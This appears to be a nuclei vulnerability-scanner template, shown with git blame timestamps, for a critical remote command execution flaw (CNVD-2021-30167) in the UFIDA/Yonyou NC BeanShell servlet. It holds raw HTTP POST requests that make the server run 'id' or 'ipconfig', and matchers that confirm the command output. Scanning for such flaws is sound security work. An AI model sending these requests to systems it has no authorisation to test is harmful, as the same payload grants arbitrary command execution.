nuclei-templates/http/cnvd/2021/CNVD-2021-30167.yaml

52 lines
1.4 KiB
YAML
Raw Normal View History

2021-06-03 17:17:18 +00:00
id: CNVD-2021-30167
2021-06-01 08:28:04 +00:00
info:
name: UFIDA NC BeanShell Remote Command Execution
2021-06-01 08:28:04 +00:00
author: pikpikcu
severity: critical
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
- https://chowdera.com/2022/03/202203110138271510.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: cnvd,cnvd2021,beanshell,rce,yonyou
2021-06-01 08:28:04 +00:00
http:
2021-06-01 08:28:04 +00:00
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-06-02 12:37:32 +00:00
2021-06-03 17:17:18 +00:00
bsh.script=exec("id");
2021-06-01 08:28:04 +00:00
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-06-02 12:37:32 +00:00
bsh.script=exec("ipconfig");
2021-06-01 08:28:04 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2021-06-03 17:17:18 +00:00
- "uid="
2021-06-01 08:28:04 +00:00
- "Windows IP"
2021-06-03 17:17:18 +00:00
condition: or
- type: word
words:
- "BeanShell Test Servlet"
2021-06-01 08:28:04 +00:00
- type: status
status:
- 200
# digest: 490a00463044022075851a06d033f726653dc465d8edecb38faafda19c132555fc9696ecb02992d7022020a632b9d53f6a468b8d01d87e238496e6284c3b5331e5ea7f0a868c534cac22:922c64590222798bb761d5b6d8e72950